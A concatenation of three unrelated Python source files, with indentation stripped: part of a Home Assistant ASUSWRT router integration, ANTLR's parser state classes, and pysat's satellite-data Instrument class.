self._connect_error = True
_LOGGER.error(
"Error connecting to ASUS router %s for device update: %s",
self._host,
exc,
)
return
if self._connect_error:
self._connect_error = False
_LOGGER.info("Reconnected to ASUS router %s", self._host)
consider_home = self._options.get(
CONF_CONSIDER_HOME, DEFAULT_CONSIDER_HOME.total_seconds()
)
track_unknown = self._options.get(CONF_TRACK_UNKNOWN, DEFAULT_TRACK_UNKNOWN)
for device_mac, device in self._devices.items():
dev_info = wrt_devices.get(device_mac)
device.update(dev_info, consider_home)
for device_mac, dev_info in wrt_devices.items():
if device_mac in self._devices:
continue
if not track_unknown and not dev_info.name:
continue
new_device = True
device = AsusWrtDevInfo(device_mac)
device.update(dev_info)
self._devices[device_mac] = device
async_dispatcher_send(self.hass, self.signal_device_update)
if new_device:
async_dispatcher_send(self.hass, self.signal_device_new)
self._connected_devices = len(wrt_devices)
await self._update_unpolled_sensors()
async def init_sensors_coordinator(self) -> None:
"""Init AsusWrt sensors coordinators."""
if self._sensors_data_handler:
return
self._sensors_data_handler = AsusWrtSensorDataHandler(self.hass, self._api)
self._sensors_data_handler.update_device_count(self._connected_devices)
sensors_types = {
SENSORS_TYPE_BYTES: SENSORS_BYTES,
SENSORS_TYPE_COUNT: SENSORS_CONNECTED_DEVICE,
SENSORS_TYPE_LOAD_AVG: SENSORS_LOAD_AVG,
SENSORS_TYPE_RATES: SENSORS_RATES,
}
for sensor_type, sensor_names in sensors_types.items():
coordinator = await self._sensors_data_handler.get_coordinator(
sensor_type, sensor_type != SENSORS_TYPE_COUNT
)
self._sensors_coordinator[sensor_type] = {
KEY_COORDINATOR: coordinator,
KEY_SENSORS: sensor_names,
}
async def _update_unpolled_sensors(self) -> None:
"""Request refresh for AsusWrt unpolled sensors."""
if not self._sensors_data_handler:
return
if SENSORS_TYPE_COUNT in self._sensors_coordinator:
coordinator = self._sensors_coordinator[SENSORS_TYPE_COUNT][KEY_COORDINATOR]
if self._sensors_data_handler.update_device_count(self._connected_devices):
await coordinator.async_refresh()
async def close(self) -> None:
"""Close the connection."""
if self._api is not None and self._protocol == PROTOCOL_TELNET:
self._api.connection.disconnect()
self._api = None
for func in self._on_close:
func()
self._on_close.clear()
@callback
def async_on_close(self, func: CALLBACK_TYPE) -> None:
"""Add a function to call when router is closed."""
self._on_close.append(func)
def update_options(self, new_options: dict) -> bool:
"""Update router options."""
req_reload = False
for name, new_opt in new_options.items():
if name in CONF_REQ_RELOAD:
old_opt = self._options.get(name)
if not old_opt or old_opt != new_opt:
req_reload = True
break
self._options.update(new_options)
return req_reload
@property
def device_info(self) -> DeviceInfo:
"""Return the device information."""
return DeviceInfo(
identifiers={(DOMAIN, "AsusWRT")},
name=self._host,
model=self._model,
manufacturer="Asus",
sw_version=self._sw_v,
configuration_url=f"http://{self._host}",
)
@property
def signal_device_new(self) -> str:
"""Event specific per AsusWrt entry to signal new device."""
return f"{DOMAIN}-device-new"
@property
def signal_device_update(self) -> str:
"""Event specific per AsusWrt entry to signal updates in devices."""
return f"{DOMAIN}-device-update"
@property
def host(self) -> str:
"""Return router hostname."""
return self._host
@property
def devices(self) -> dict[str, Any]:
"""Return devices."""
return self._devices
@property
def sensors_coordinator(self) -> dict[str, Any]:
"""Return sensors coordinators."""
return self._sensors_coordinator
@property
def api(self) -> AsusWrt:
"""Return router API."""
return self._api
async def _get_nvram_info(api: AsusWrt, info_type: str) -> dict[str, Any]:
"""Get AsusWrt router info from nvram."""
info = {}
try:
info = await api.async_get_nvram(info_type)
except (OSError, UnicodeDecodeError) as exc:
_LOGGER.warning("Error calling method async_get_nvram(%s): %s", info_type, exc)
return info
def get_api(conf: dict, options: dict | None = None) -> AsusWrt:
"""Get the AsusWrt API."""
opt = options or {}
return AsusWrt(
conf[CONF_HOST],
conf[CONF_PORT],
conf[CONF_PROTOCOL] == PROTOCOL_TELNET,
conf[CONF_USERNAME],
conf.get(CONF_PASSWORD, ""),
conf.get(CONF_SSH_KEY, ""),
conf[CONF_MODE],
opt.get(CONF_REQUIRE_IP, True),
interface=opt.get(CONF_INTERFACE, DEFAULT_INTERFACE),
dnsmasq=opt.get(CONF_DNSMASQ, DEFAULT_DNSMASQ),
)
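# Illustrative sketch (not part of the integration): build the API wrapper
# directly from a plain dict mirroring the config entry data used above.
# Host and credentials are placeholders.
_EXAMPLE_CONF = {
    CONF_HOST: "192.168.1.1",
    CONF_PORT: 22,
    CONF_PROTOCOL: "ssh",
    CONF_USERNAME: "admin",
    CONF_PASSWORD: "router-password",
    CONF_MODE: "router",
}
# api = get_api(_EXAMPLE_CONF)  # returns a configured aioasuswrt AsusWrt client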
|
|
#
# Copyright (c) 2012-2017 The ANTLR Project. All rights reserved.
# Use of this file is governed by the BSD 3-clause license that
# can be found in the LICENSE.txt file in the project root.
#
# The following images show the relation of states and
# {@link ATNState#transitions} for various grammar constructs.
#
# <ul>
#
# <li>Solid edges marked with an ε indicate a required
# {@link EpsilonTransition}.</li>
#
# <li>Dashed edges indicate locations where any transition derived from
# {@link Transition} might appear.</li>
#
# <li>Dashed nodes are place holders for either a sequence of linked
# {@link BasicState} states or the inclusion of a block representing a nested
# construct in one of the forms below.</li>
#
# <li>Nodes showing multiple outgoing alternatives with a {@code ...} support
# any number of alternatives (one or more). Nodes without the {@code ...} only
# support the exact number of alternatives shown in the diagram.</li>
#
# </ul>
#
# <h2>Basic Blocks</h2>
#
# <h3>Rule</h3>
#
# <embed src="images/Rule.svg" type="image/svg+xml"/>
#
# <h3>Block of 1 or more alternatives</h3>
#
# <embed src="images/Block.svg" type="image/svg+xml"/>
#
# <h2>Greedy Loops</h2>
#
# <h3>Greedy Closure: {@code (...)*}</h3>
#
# <embed src="images/ClosureGreedy.svg" type="image/svg+xml"/>
#
# <h3>Greedy Positive Closure: {@code (...)+}</h3>
#
# <embed src="images/PositiveClosureGreedy.svg" type="image/svg+xml"/>
#
# <h3>Greedy Optional: {@code (...)?}</h3>
#
# <embed src="images/OptionalGreedy.svg" type="image/svg+xml"/>
#
# <h2>Non-Greedy Loops</h2>
#
# <h3>Non-Greedy Closure: {@code (...)*?}</h3>
#
# <embed src="images/ClosureNonGreedy.svg" type="image/svg+xml"/>
#
# <h3>Non-Greedy Positive Closure: {@code (...)+?}</h3>
#
# <embed src="images/PositiveClosureNonGreedy.svg" type="image/svg+xml"/>
#
# <h3>Non-Greedy Optional: {@code (...)??}</h3>
#
# <embed src="images/OptionalNonGreedy.svg" type="image/svg+xml"/>
#
INITIAL_NUM_TRANSITIONS = 4
class ATNState(object):
# constants for serialization
INVALID_TYPE = 0
BASIC = 1
RULE_START = 2
BLOCK_START = 3
PLUS_BLOCK_START = 4
STAR_BLOCK_START = 5
TOKEN_START = 6
RULE_STOP = 7
BLOCK_END = 8
STAR_LOOP_BACK = 9
STAR_LOOP_ENTRY = 10
PLUS_LOOP_BACK = 11
LOOP_END = 12
serializationNames = [
"INVALID",
"BASIC",
"RULE_START",
"BLOCK_START",
"PLUS_BLOCK_START",
"STAR_BLOCK_START",
"TOKEN_START",
"RULE_STOP",
"BLOCK_END",
"STAR_LOOP_BACK",
"STAR_LOOP_ENTRY",
"PLUS_LOOP_BACK",
"LOOP_END" ]
INVALID_STATE_NUMBER = -1
def __init__(self):
# Which ATN are we in?
self.atn = None
self.stateNumber = ATNState.INVALID_STATE_NUMBER
self.stateType = None
self.ruleIndex = 0 # at runtime, we don't have Rule objects
self.epsilonOnlyTransitions = False
# Track the transitions emanating from this ATN state.
self.transitions = []
# Used to cache lookahead during parsing, not used during construction
self.nextTokenWithinRule = None
def __hash__(self):
return self.stateNumber
def __eq__(self, other):
return isinstance(other, ATNState) and self.stateNumber==other.stateNumber
def onlyHasEpsilonTransitions(self):
return self.epsilonOnlyTransitions
def isNonGreedyExitState(self):
return False
def __str__(self):
return unicode(self)
def __unicode__(self):
return unicode(self.stateNumber)
def addTransition(self, trans, index=-1):
if len(self.transitions)==0:
self.epsilonOnlyTransitions = trans.isEpsilon
elif self.epsilonOnlyTransitions != trans.isEpsilon:
self.epsilonOnlyTransitions = False
# TODO System.err.format(Locale.getDefault(), "ATN state %d has both epsilon and non-epsilon transitions.\n", stateNumber);
if index==-1:
self.transitions.append(trans)
else:
self.transitions.insert(index, trans)
class BasicState(ATNState):
def __init__(self):
super(BasicState, self).__init__()
self.stateType = self.BASIC
class DecisionState(ATNState):
def __init__(self):
super(DecisionState, self).__init__()
self.decision = -1
self.nonGreedy = False
# The start of a regular {@code (...)} block.
class BlockStartState(DecisionState):
def __init__(self):
super(BlockStartState, self).__init__()
self.endState = None
class BasicBlockStartState(BlockStartState):
def __init__(self):
super(BasicBlockStartState, self).__init__()
self.stateType = self.BLOCK_START
# Terminal node of a simple {@code (a|b|c)} block.
class BlockEndState(ATNState):
def __init__(self):
super(BlockEndState, self).__init__()
self.stateType = self.BLOCK_END
self.startState = None
# The last node in the ATN for a rule, unless that rule is the start symbol.
# In that case, there is one transition to EOF. Later, we might encode
# references to all calls to this rule to compute FOLLOW sets for
# error handling.
#
class RuleStopState(ATNState):
def __init__(self):
super(RuleStopState, self).__init__()
self.stateType = self.RULE_STOP
class RuleStartState(ATNState):
def __init__(self):
super(RuleStartState, self).__init__()
self.stateType = self.RULE_START
self.stopState = None
self.isPrecedenceRule = False
# Decision state for {@code A+} and {@code (A|B)+}. It has two transitions:
# one to the loop back to start of the block and one to exit.
#
class PlusLoopbackState(DecisionState):
def __init__(self):
super(PlusLoopbackState, self).__init__()
self.stateType = self.PLUS_LOOP_BACK
# Start of {@code (A|B|...)+} loop. Technically a decision state, but
# we don't use it for code generation; somebody might need it, so I'm defining
# it for completeness. In reality, the {@link PlusLoopbackState} node is the
# real decision-making node for {@code A+}.
#
class PlusBlockStartState(BlockStartState):
def __init__(self):
super(PlusBlockStartState, self).__init__()
self.stateType = self.PLUS_BLOCK_START
self.loopBackState = None
# The block that begins a closure loop.
class StarBlockStartState(BlockStartState):
def __init__(self):
super(StarBlockStartState, self).__init__()
self.stateType = self.STAR_BLOCK_START
class StarLoopbackState(ATNState):
def __init__(self):
super(StarLoopbackState, self).__init__()
self.stateType = self.STAR_LOOP_BACK
class StarLoopEntryState(DecisionState):
def __init__(self):
super(StarLoopEntryState, self).__init__()
self.stateType = self.STAR_LOOP_ENTRY
self.loopBackState = None
# Indicates whether this state can benefit from a precedence DFA during SLL decision making.
self.isPrecedenceDecision = None
# Mark the end of a * or + loop.
class LoopEndState(ATNState):
def __init__(self):
super(LoopEndState, self).__init__()
self.stateType = self.LOOP_END
self.loopBackState = None
# The Tokens rule start state linking to each lexer rule start state
class TokensStartState(DecisionState):
def __init__(self):
super(TokensStartState, self).__init__()
self.stateType = self.TOKEN_START
|
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import string
import os
import copy
import sys
import pandas as pds
import numpy as np
from . import _custom
from . import _files
from . import _orbits
from . import _meta
from . import utils
from pysat import data_dir
from pysat import DataFrame, Series
# main class for users
class Instrument(object):
"""Download, load, manage, modify and analyze science data.
Parameters
----------
platform : string
name of platform/satellite.
name : string
name of instrument.
tag : string, optional
identifies particular subset of instrument data.
sat_id : string, optional
identity within constellation
clean_level : {'clean','dusty','dirty','none'}, optional
level of data quality
pad : pandas.DateOffset, or dictionary, optional
        Length of time to pad the beginning and end of loaded data for
time-series processing. Extra data is removed after applying all
custom functions. Dictionary, if supplied, is simply passed to
pandas DateOffset.
orbit_info : dict
Orbit information, {'index':index, 'kind':kind, 'period':period}.
See pysat.Orbits for more information.
inst_module : module, optional
Provide instrument module directly.
Takes precedence over platform/name.
update_files : boolean, optional
If True, immediately query filesystem for instrument files and store.
temporary_file_list : boolean, optional
If true, the list of Instrument files will not be written to disk.
Prevents a race condition when running multiple pysat processes.
multi_file_day : boolean, optional
Set to True if Instrument data files for a day are spread across
multiple files and data for day n could be found in a file
with a timestamp of day n-1 or n+1.
manual_org : bool
if True, then pysat will look directly in pysat data directory
for data files and will not use default /platform/name/tag
directory_format : str
directory naming structure in string format. Variables such as
platform, name, and tag will be filled in as needed using python
string formatting. The default directory structure would be
expressed as '{platform}/{name}/{tag}'
file_format : str or NoneType
File naming structure in string format. Variables such as year,
month, and sat_id will be filled in as needed using python string
formatting. The default file format structure is supplied in the
instrument list_files routine.
Attributes
----------
data : pandas.DataFrame
loaded science data
date : pandas.datetime
date for loaded data
yr : int
year for loaded data
bounds : (datetime/filename/None, datetime/filename/None)
bounds for loading data, supply array_like for a season with gaps
doy : int
day of year for loaded data
files : pysat.Files
interface to instrument files
meta : pysat.Meta
interface to instrument metadata, similar to netCDF 1.6
orbits : pysat.Orbits
interface to extracting data orbit-by-orbit
custom : pysat.Custom
interface to instrument nano-kernel
kwargs : dictionary
keyword arguments passed to instrument loading routine
Note
----
Pysat attempts to load the module platform_name.py located in
the pysat/instruments directory. This module provides the underlying
functionality to download, load, and clean instrument data.
Alternatively, the module may be supplied directly
using keyword inst_module.
Examples
--------
::
# 1-second mag field data
vefi = pysat.Instrument(platform='cnofs',
name='vefi',
tag='dc_b',
clean_level='clean')
start = pysat.datetime(2009,1,1)
stop = pysat.datetime(2009,1,2)
vefi.download(start, stop)
vefi.load(date=start)
print(vefi['dB_mer'])
print(vefi.meta['db_mer'])
# 1-second thermal plasma parameters
ivm = pysat.Instrument(platform='cnofs',
name='ivm',
tag='',
clean_level='clean')
ivm.download(start,stop)
ivm.load(2009,1)
print(ivm['ionVelmeridional'])
# Ionosphere profiles from GPS occultation
cosmic = pysat.Instrument('cosmic2013',
'gps',
'ionprf',
altitude_bin=3)
# bins profile using 3 km step
cosmic.download(start, stop, user=user, password=password)
cosmic.load(date=start)
"""
def __init__(self, platform=None, name=None, tag=None, sat_id=None,
clean_level='clean', update_files=None, pad=None,
orbit_info=None, inst_module=None, multi_file_day=None,
manual_org=None, directory_format=None, file_format=None,
temporary_file_list=False,
*arg, **kwargs):
if inst_module is None:
# use strings to look up module name
if isinstance(platform, str) and isinstance(name, str):
self.platform = platform.lower()
self.name = name.lower()
# look to module for instrument functions and defaults
self._assign_funcs(by_name=True)
elif (platform is None) and (name is None):
# creating "empty" Instrument object with this path
self.name = ''
self.platform = ''
self._assign_funcs()
else:
raise ValueError('Inputs platform and name must both be strings, or both None.')
else:
# user has provided a module
try:
# platform and name are expected to be part of module
self.name = inst_module.name.lower()
self.platform = inst_module.platform.lower()
except AttributeError:
                raise AttributeError(' '.join(('A name and platform attribute for the',
                    'instrument is required if supplying routine module directly.')))
# look to module for instrument functions and defaults
self._assign_funcs(inst_module=inst_module)
# more reasonable defaults for optional parameters
self.tag = tag.lower() if tag is not None else ''
self.sat_id = sat_id.lower() if sat_id is not None else ''
self.clean_level = (clean_level.lower() if clean_level is not None
else 'none')
# assign_func sets some instrument defaults, direct info rules all
if directory_format is not None:
self.directory_format = directory_format.lower()
# value not provided by user, check if there is a value provided by
# instrument module
elif self.directory_format is not None:
try:
# check if it is a function
self.directory_format = self.directory_format(tag, sat_id)
except TypeError:
pass
if file_format is not None:
self.file_format = file_format
# check to make sure value is reasonable
if self.file_format is not None:
# check if it is an iterable string. If it isn't formatted
# properly, raise Error
if (not isinstance(self.file_format, str) or
(self.file_format.find("{") < 0) or
(self.file_format.find("}") < 0)):
                estr = 'file format set to default, supplied string must be '
                estr = '{:s}iterable [{:}]'.format(estr, self.file_format)
raise ValueError(estr)
# set up empty data and metadata
self.data = DataFrame(None)
self.meta = _meta.Meta()
# function processing class, processes data on load
self.custom = _custom.Custom()
# create arrays to store data around loaded day
# enables padding across day breaks with minimal loads
self._next_data = DataFrame(None)
self._next_data_track = []
self._prev_data = DataFrame(None)
self._prev_data_track = []
self._curr_data = DataFrame(None)
# multi file day, default set by assign_funcs
if multi_file_day is not None:
self.multi_file_day = multi_file_day
# arguments for padding
if isinstance(pad, pds.DateOffset):
self.pad = pad
elif isinstance(pad, dict):
self.pad = pds.DateOffset(**pad)
elif pad is None:
self.pad = None
else:
estr = 'pad must be a dictionary or a pandas.DateOffset instance.'
raise ValueError(estr)
# instantiate Files class
manual_org = False if manual_org is None else manual_org
temporary_file_list = not temporary_file_list
self.files = _files.Files(self, manual_org=manual_org,
directory_format=self.directory_format,
update_files=update_files,
file_format=self.file_format,
write_to_disk=temporary_file_list)
# set bounds for iteration
# self.bounds requires the Files class
# setting (None,None) loads default bounds
self.bounds = (None, None)
self.date = None
self._fid = None
self.yr = None
self.doy = None
self._load_by_date = False
# initialize orbit support
if orbit_info is None:
if self.orbit_info is None:
# if default info not provided, set None as default
orbit_info = {'index': None, 'kind': None, 'period': None}
else:
# default provided by instrument module
orbit_info = self.orbit_info
self.orbits = _orbits.Orbits(self, **orbit_info)
# store kwargs, passed to load routine
self.kwargs = kwargs
# run instrument init function, a basic pass function is used
# if user doesn't supply the init function
self._init_rtn(self)
# store base attributes, used in particular by Meta class
self._base_attr = dir(self)
def __getitem__(self, key):
"""
Convenience notation for accessing data; inst['name'] is inst.data.name
Examples
--------
::
# By name
inst['name']
# By position
inst[row_index, 'name']
# Slicing by row
inst[row1:row2, 'name']
# By Date
inst[datetime, 'name']
# Slicing by date, inclusive
inst[datetime1:datetime2, 'name']
# Slicing by name and row/date
inst[datetime1:datetime1, 'name1':'name2']
"""
if isinstance(key, tuple):
# support slicing
return self.data.ix[key[0], key[1]]
else:
return self.data[key]
def __setitem__(self, key, new):
"""Convenience method for adding data to instrument.
Examples
--------
::
# Simple Assignment, default metadata assigned
# 'long_name' = 'name'
# 'units' = ''
inst['name'] = newData
# Assignment with Metadata
inst['name'] = {'data':new_data,
'long_name':long_name,
'units':units}
Note
----
If no metadata provided and if metadata for 'name' not already stored
then default meta information is also added,
long_name = 'name', and units = ''.
"""
if isinstance(new, dict):
# metadata should be included in dict
self.data[key] = new.pop('data')
# pass the rest to meta
self.meta[key] = new
else:
if isinstance(key, tuple):
self.data.ix[key[0], key[1]] = new
self.meta[key[1]] = {}
elif isinstance(key, str):
self.data[key] = new
self.meta[key] = {}
elif isinstance(new, DataFrame):
self.data[key] = new[key]
for ke in key:
self.meta[ke] = {}
else:
raise ValueError("No support for supplied input key")
@property
def empty(self):
"""Boolean flag reflecting lack of data.
True if there is no Instrument data."""
return self.data.empty
def copy(self):
"""Deep copy of the entire Instrument object."""
return copy.deepcopy(self)
def _pass_func(*args, **kwargs):
pass
def _assign_funcs(self, by_name=False, inst_module=None):
"""Assign all external science instrument methods to Instrument object."""
import importlib
# set defaults
self._list_rtn = self._pass_func
self._load_rtn = self._pass_func
self._default_rtn = self._pass_func
self._clean_rtn = self._pass_func
self._init_rtn = self._pass_func
self._download_rtn = self._pass_func
# default params
self.directory_format = None
self.file_format = None
self.multi_file_day = False
self.orbit_info = None
if by_name:
# look for code with filename name, any errors passed up
inst = importlib.import_module(''.join(('.', self.platform, '_',
self.name)), package='pysat.instruments')
elif inst_module is not None:
# user supplied an object with relevant instrument routines
inst = inst_module
else:
# no module or name info, default pass functions assigned
return
try:
self._load_rtn = inst.load
self._list_rtn = inst.list_files
self._download_rtn = inst.download
except AttributeError:
            estr = 'A load, list_files, and download routine are required for '
            raise AttributeError('{:s}every instrument.'.format(estr))
try:
self._default_rtn = inst.default
except AttributeError:
pass
try:
self._init_rtn = inst.init
except AttributeError:
pass
try:
self._clean_rtn = inst.clean
except AttributeError:
pass
# look for instrument default parameters
try:
self.directory_format = inst.directory_format
except AttributeError:
pass
try:
            self.multi_file_day = inst.multi_file_day
except AttributeError:
pass
try:
self.orbit_info = inst.orbit_info
except AttributeError:
pass
return
def __repr__(self):
output_str = '\npysat Instrument object\n'
output_str += '-----------------------\n'
output_str += 'Platform: '+self.platform+'\n'
output_str += 'Name: '+self.name+'\n'
output_str += 'Tag: '+self.tag+'\n'
output_str += 'Satellite id: '+self.sat_id+'\n'
output_str += '\nData Processing\n'
output_str += '---------------\n'
output_str += 'Cleaning Level: ' + self.clean_level + '\n'
output_str += 'Data Padding: ' + self.pad.__repr__() + '\n'
output_str += 'Keyword Arguments Passed to load(): ' + self.kwargs.__repr__() +'\n'
        output_str += 'Custom Functions:\n'
if len(self.custom._functions) > 0:
for func in self.custom._functions:
                output_str += '    ' + func.__repr__() + '\n'
else:
output_str += ' ' + 'No functions applied.\n'
output_str += '\nOrbit Settings' + '\n'
output_str += '--------------' + '\n'
if self.orbit_info is None:
output_str += 'Orbit properties not set.\n'
else:
output_str += 'Orbit Kind: ' + self.orbit_info['kind'] + '\n'
output_str += 'Orbit Index: ' + self.orbit_info['index'] + '\n'
output_str += 'Orbit Period: ' + self.orbit_info['period'].__str__() + '\n'
output_str += 'Number of Orbits: {:d}'.format(self.orbits.num) + '\n'
output_str += 'Loaded Orbit Number: {:d}'.format(self.orbits.current) + '\n'
output_str += '\nLocal File Statistics' + '\n'
output_str += '---------------------' + '\n'
output_str += 'Number of files: ' + str(len(self.files.files)) + '\n'
output_str += 'Date Range: '+self.files.files.index[0].strftime('%m/%d/%Y')
output_str += ' --- ' + self.files.files.index[-1].strftime('%m/%d/%Y') + '\n'
output_str += '\nLoaded Data Statistics'+'\n'
output_str += '----------------------'+'\n'
if not self.empty:
# if self._fid is not None:
# output_str += 'Filename: ' +
output_str += 'Date: ' + self.date.strftime('%m/%d/%Y') + '\n'
output_str += 'DOY: {:03d}'.format(self.doy) + '\n'
output_str += 'Time range: ' + self.data.index[0].strftime('%m/%d/%Y %H:%M:%S') + ' --- '
output_str += self.data.index[-1].strftime('%m/%d/%Y %H:%M:%S')+'\n'
output_str += 'Number of Times: ' + str(len(self.data.index)) + '\n'
output_str += 'Number of variables: ' + str(len(self.data.columns)) + '\n'
output_str += '\nVariable Names:'+'\n'
num = len(self.data.columns)//3
for i in np.arange(num):
output_str += self.data.columns[3 * i].ljust(30)
output_str += self.data.columns[3 * i + 1].ljust(30)
output_str += self.data.columns[3 * i + 2].ljust(30)+'\n'
for i in np.arange(len(self.data.columns) - 3 * num):
output_str += self.data.columns[i+3*num].ljust(30)
output_str += '\n'
else:
output_str += 'No loaded data.'+'\n'
output_str += '\n'
return output_str
def _load_data(self, date=None, fid=None):
"""
        Load data for an instrument on given date or fid, depending upon input.
"""
if fid is not None:
# get filename based off of index value
fname = self.files[fid:fid+1]
elif date is not None:
fname = self.files[date: date+pds.DateOffset(days=1)]
else:
raise ValueError('Must supply either a date or file id number.')
if len(fname) > 0:
load_fname = [os.path.join(self.files.data_path, f) for f in fname]
data, mdata = self._load_rtn(load_fname, tag=self.tag,
sat_id=self.sat_id, **self.kwargs)
else:
data = DataFrame(None)
mdata = _meta.Meta()
output_str = '{platform} {name} {tag} {sat_id}'
output_str = output_str.format(platform=self.platform,
name=self.name, tag=self.tag,
sat_id=self.sat_id)
if not data.empty:
if not isinstance(data, DataFrame):
raise TypeError(' '.join(('Data returned by instrument load',
'routine must be a pandas.DataFrame')))
if not isinstance(mdata, _meta.Meta):
raise TypeError('Metadata returned must be a pysat.Meta object')
if date is not None:
output_str = ' '.join(('Returning', output_str, 'data for', date.strftime('%D')))
else:
if len(fname) == 1:
                    # this length check was previously against zero
output_str = ' '.join(('Returning', output_str, 'data from', fname[0]))
else:
output_str = ' '.join(('Returning', output_str, 'data from', fname[0], '::', fname[-1]))
else:
# no data signal
output_str = ' '.join(('No', output_str, 'data for', date.strftime('%D')))
# remove extra spaces, if any
output_str = " ".join(output_str.split())
        print(output_str)
return data, mdata
def _load_next(self):
"""Load the next days data (or file) without incrementing the date.
Repeated calls will not advance date/file and will produce the same data
Uses info stored in object to either increment the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
next_date = self.date + pds.DateOffset(days=1)
return self._load_data(date=next_date)
else:
return self._load_data(fid=self._fid+1)
def _load_prev(self):
"""Load the next days data (or file) without decrementing the date.
Repeated calls will not decrement date/file and will produce the same data
Uses info stored in object to either decrement the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
prev_date = self.date - pds.DateOffset(days=1)
return self._load_data(date=prev_date)
else:
return self._load_data(fid=self._fid-1)
def _set_load_parameters(self, date=None, fid=None):
self.date = date
self._fid = fid
if date is not None:
year, doy = utils.getyrdoy(date)
self.yr = year
self.doy = doy
self._load_by_date = True
else:
self.yr = None
self.doy = None
self._load_by_date = False
def load(self, yr=None, doy=None, date=None, fname=None, fid=None,
verifyPad=False):
"""Load instrument data into Instrument object .data.
Parameters
----------
yr : integer
year for desired data
doy : integer
day of year
date : datetime object
date to load
        fname : string
            filename to be loaded
        fid : integer
            index of the file to be loaded, relative to the local file list
        verifyPad : boolean
            if True, padding data not removed (debug purposes)
Returns
--------
Void. Data is added to self.data
Note
----
Loads data for a chosen instrument into .data. Any functions chosen
by the user and added to the custom processing queue (.custom.add)
are automatically applied to the data before it is available to
user in .data.
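        Examples
        --------
        ::
            # illustrative usage; platform/name are placeholders
            inst = pysat.Instrument(platform=platform, name=name, tag=tag)
            # load by year, day of year
            inst.load(2009, 1)
            # load by date
            inst.load(date=pysat.datetime(2009, 1, 1))
            # load by filename from the local file list
            inst.load(fname=inst.files[0])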
"""
# set options used by loading routine based upon user input
if date is not None:
self._set_load_parameters(date=date, fid=None)
# increment
inc = pds.DateOffset(days=1)
curr = date
elif (yr is not None) & (doy is not None):
date = pds.datetime(yr, 1, 1) + pds.DateOffset(days=(doy-1))
self._set_load_parameters(date=date, fid=None)
# increment
inc = pds.DateOffset(days=1)
curr = self.date
elif fname is not None:
# date will have to be set later by looking at the data
self._set_load_parameters(date=None, fid=self.files.get_index(fname))
# increment one file at a time
inc = 1
curr = self._fid.copy()
elif fid is not None:
self._set_load_parameters(date=None, fid=fid)
# increment one file at a time
inc = 1
curr = fid
else:
            estr = 'Must supply a yr, doy pair, a datetime object, or a'
            estr = '{:s} filename to load data from.'.format(estr)
raise TypeError(estr)
self.orbits._reset()
# if pad or multi_file_day is true, need to have a three day/file load
loop_pad = self.pad if self.pad is not None else pds.DateOffset(seconds=0)
if (self.pad is not None) | self.multi_file_day:
if self._next_data.empty & self._prev_data.empty:
# data has not already been loaded for previous and next days
# load data for all three
print('Initializing three day/file window')
# using current date or fid
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = \
self._load_data(date=self.date, fid=self._fid)
self._next_data, self._next_meta = self._load_next()
else:
# moving forward in time
if self._next_data_track == curr:
self._prev_data = self._curr_data
self._prev_meta = self._curr_meta
self._curr_data = self._next_data
self._curr_meta = self._next_meta
self._next_data, self._next_meta = self._load_next()
# moving backward in time
elif self._prev_data_track == curr:
self._next_data = self._curr_data
self._next_meta = self._curr_meta
self._curr_data = self._prev_data
self._curr_meta = self._prev_meta
self._prev_data, self._prev_meta = self._load_prev()
# jumped in time/or switched from filebased to date based access
else:
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = \
self._load_data(date=self.date, fid=self._fid)
self._next_data, self._next_meta = self._load_next()
            # make sure datetime indices for all data are monotonic
if not self._prev_data.index.is_monotonic_increasing:
self._prev_data.sort_index(inplace=True)
if not self._curr_data.index.is_monotonic_increasing:
self._curr_data.sort_index(inplace=True)
if not self._next_data.index.is_monotonic_increasing:
self._next_data.sort_index(inplace=True)
# make tracking indexes consistent with new loads
self._next_data_track = curr + inc
self._prev_data_track = curr - inc
# attach data to object
if not self._curr_data.empty:
self.data = self._curr_data.copy()
self.meta = self._curr_meta.copy()
else:
self.data = DataFrame(None)
# line below removed as it would delete previous meta, if any
# if you end a seasonal analysis with a day with no data, then
# no meta: self.meta = _meta.Meta()
# multi file days can extend past a single day, only want data from
# specific date if loading by day
# set up times for the possible data padding coming up
if self._load_by_date:
#print ('double trouble')
first_time = self.date
first_pad = self.date - loop_pad
last_time = self.date + pds.DateOffset(days=1)
last_pad = self.date + pds.DateOffset(days=1) + loop_pad
want_last_pad = False
            # loading by file; can't be a multi_file_day situation
elif (not self._load_by_date) and (not self.multi_file_day):
#print ('single trouble')
first_time = self._curr_data.index[0]
first_pad = first_time - loop_pad
last_time = self._curr_data.index[-1]
last_pad = last_time + loop_pad
want_last_pad = True
else:
raise ValueError("multi_file_day and loading by date are effectively equivalent."+
"Can't have multi_file_day and load by file.")
#print (first_pad, first_time, last_time, last_pad)
# pad data based upon passed parameter
if (not self._prev_data.empty) & (not self.data.empty):
padLeft = self._prev_data.loc[first_pad : self.data.index[0]]
if len(padLeft) > 0:
if (padLeft.index[-1] == self.data.index[0]) :
padLeft = padLeft.iloc[:-1, :]
self.data = pds.concat([padLeft, self.data])
if (not self._next_data.empty) & (not self.data.empty):
padRight = self._next_data.loc[self.data.index[-1] : last_pad]
if len(padRight) > 0:
if (padRight.index[0] == self.data.index[-1]) :
padRight = padRight.iloc[1:, :]
self.data = pds.concat([self.data, padRight])
self.data = self.data.ix[first_pad : last_pad]
# want exclusive end slicing behavior from above
if (self.data.index[-1] == last_pad) & (not want_last_pad):
self.data = self.data.iloc[:-1, :]
## drop any possible duplicate index times
##self.data.drop_duplicates(inplace=True)
#self.data = self.data[~self.data.index.duplicated()]
# if self.pad is False, load single day
else:
self.data, meta = self._load_data(date=self.date, fid=self._fid)
if not self.data.empty:
self.meta = meta
# check if load routine actually returns meta
if self.meta.data.empty:
self.meta[self.data.columns] = {'long_name': self.data.columns,
'units': ['']*len(self.data.columns)}
# if loading by file set the yr, doy, and date
if not self._load_by_date:
if self.pad is not None:
temp = first_time
else:
temp = self.data.index[0]
self.date = pds.datetime(temp.year, temp.month, temp.day)
self.yr, self.doy = utils.getyrdoy(self.date)
if not self.data.empty:
self._default_rtn(self)
# clean
if (not self.data.empty) & (self.clean_level != 'none'):
self._clean_rtn(self)
# apply custom functions
if not self.data.empty:
self.custom._apply_all(self)
# remove the excess padding, if any applied
if (self.pad is not None) & (not self.data.empty) & (not verifyPad):
self.data = self.data[first_time : last_time]
